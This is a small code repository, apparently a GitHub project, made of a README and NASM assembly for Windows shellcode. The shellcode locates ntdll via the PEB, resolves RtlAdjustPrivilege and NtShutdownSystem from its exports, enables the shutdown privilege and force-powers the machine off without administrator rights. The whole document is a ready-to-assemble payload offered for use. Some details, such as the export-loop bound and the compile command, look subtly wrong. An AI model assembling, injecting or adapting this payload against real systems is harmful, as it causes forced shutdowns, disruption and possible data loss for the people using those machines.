├── README.md
└── ntshutdown.asm


/README.md:
--------------------------------------------------------------------------------
 1 | # ntshutdown-shellcode
 2 | Windows hard shutdown shellcode. Don't need administrator rights.
 3 | 
 4 | # compile
 5 | 
 6 | nasm -f ntshutdown.asm -o ntshutdown.bin
 7 | 
 8 | # tested
 9 | Windows 10     X64/86
10 | Windows 7      X64/86
11 | Windows 8/8.1  x64/86
12 | 


--------------------------------------------------------------------------------
/ntshutdown.asm:
--------------------------------------------------------------------------------
  1 | BITS 32
  2 | 
  3 | global _start
  4 | section .text
  5 | 
  6 | _start:
  7 | 
  8 | ; Local variables:
  9 | ;
 10 | ; [ebp-4] Address of ntdll.dll
 11 | ; [ebp-8] Address of ntdll.dll's export table
 12 | ; [ebp-12] Space for RtlAdjustPrivilege's output
 13 | 
 14 | push ebp
 15 | mov ebp,esp
 16 | sub esp,12
 17 | 
 18 | ; Save registers
 19 | 
 20 | push ebx
 21 | push esi
 22 | push edi
 23 | 
 24 | jmp get_delta_offset ; Get the delta offset
 25 | 
 26 | get_delta_offset2:
 27 |     pop ebx
 28 | 	jmp start ; Jump to main code
 29 | 
 30 | get_delta_offset:
 31 |     call get_delta_offset2
 32 | 	
 33 | data:
 34 |     NtShutdownSystem_s db "NtShutdownSystem"
 35 | 	NtShutdownSystem_len equ $-NtShutdownSystem_s
 36 | 	
 37 | 	RtlAdjustPrivilege_s db "RtlAdjustPrivilege"
 38 | 	RtlAdjustPrivilege_len equ $-RtlAdjustPrivilege_s
 39 | 	
 40 | get_function_address:
 41 | 
 42 |     ; Save registers
 43 | 
 44 |     push ebx
 45 | 	push esi
 46 | 	push edi
 47 | 	
 48 |     mov eax,[ebp-8]
 49 | 	mov ebx,[eax+0x20] ; ebx now points to the export names array
 50 | 	
 51 | 	add ebx,[ebp-4]
 52 | 	xor eax,eax
 53 | 	
 54 | 	.get_function_address_loop:
 55 | 	    mov esi,edx ; esi now points to the function
 56 | 		mov edi,[ebx+eax*4]
 57 | 		add edi,[ebp-4] ; edi now points to the export name
 58 | 		
 59 | 		push ecx ; Save the function name length
 60 | 		cld ; Clear the direction flag
 61 | 		
 62 | 		rep cmpsb ; Do the comparison
 63 | 		pop ecx ; Restore the length
 64 | 		
 65 | 		je .get_function_address_end
 66 | 		inc eax
 67 | 		
 68 | 		cmp eax,[ebx+0x14]
 69 | 		jl .get_function_address_loop
 70 | 		
 71 | 	.get_function_address_fail:
 72 | 	    pop edi
 73 | 		pop esi
 74 | 		pop ebx
 75 | 		
 76 | 	    xor eax,eax
 77 | 		ret
 78 | 		
 79 | 	.get_function_address_end:
 80 | 		mov ebx,[ebp-8]
 81 | 		mov ecx,[ebx+0x1c]
 82 | 		
 83 | 		add ecx,[ebp-4] ; ecx now points to the function addresses array
 84 | 		
 85 | 		mov edx,[ebx+0x24]
 86 | 		add edx,[ebp-4] ; edx now points to the ordinals array
 87 | 		
 88 | 		movzx eax,word [edx+eax*2] ; eax now holds the ordinal
 89 | 		mov eax,[ecx+eax*4] ; eax now holds the RVA of the function
 90 | 		
 91 | 		add eax,[ebp-4] ; eax now holds the address of the function
 92 | 		
 93 | 		; Restore registers
 94 | 		
 95 | 		pop edi
 96 | 		pop esi
 97 | 		pop ebx
 98 | 		
 99 | 		ret
100 | 		
101 | start:
102 | 
103 | xor ecx,ecx
104 | mov eax,[fs:ecx+0x30] ; eax now points to the PEB
105 | 
106 | mov eax,[eax+0xc] ; eax now points to loader data
107 | mov eax,[eax+0x14]
108 | 
109 | mov eax,[eax+ecx]
110 | mov eax,[eax+0x10] ; eax now holds the address of ntdll.dll
111 | 
112 | mov [ebp-4],eax ; Save the address of ntdll.dll
113 | 
114 | add eax,[eax+0x3c] ; eax now points to the PE header
115 | mov eax,[eax+0x78] ; eax now points to the export directory
116 | add eax,[ebp-4] ; eax now points to the export table
117 | 
118 | mov [ebp-8],eax
119 | xor ecx,ecx
120 | 
121 | mov cl,NtShutdownSystem_len
122 | mov edx,ebx
123 | 
124 | add ebx,ecx ; Move to next string
125 | call get_function_address
126 | 
127 | test eax,eax
128 | je exit
129 | 
130 | mov esi,eax
131 | xor ecx,ecx
132 | 
133 | mov cl,RtlAdjustPrivilege_len
134 | mov edx,ebx
135 | 
136 | call get_function_address
137 | 
138 | test eax,eax
139 | je exit
140 | 
141 | mov edi,eax
142 | xor eax,eax
143 | 
144 | ; Enable SeShutdownPrivilege
145 | 
146 | lea ecx,[ebp-12]
147 | 
148 | push ecx
149 | push eax ; CurrentThread = FALSE
150 | push 1 ; Enable = TRUE
151 | push 19 ; SeShutdownPrivilege
152 | 
153 | call edi ; Call RtlAdjustPrivilege
154 | xor eax,eax
155 | 
156 | push eax ; ShutdownNoReboot
157 | call esi ; Call NtShutdownSystem
158 | 
159 | exit:
160 | 
161 | pop edi
162 | pop esi
163 | pop ebx
164 | 
165 | mov esp,ebp
166 | pop ebp
167 | ret
168 | 


--------------------------------------------------------------------------------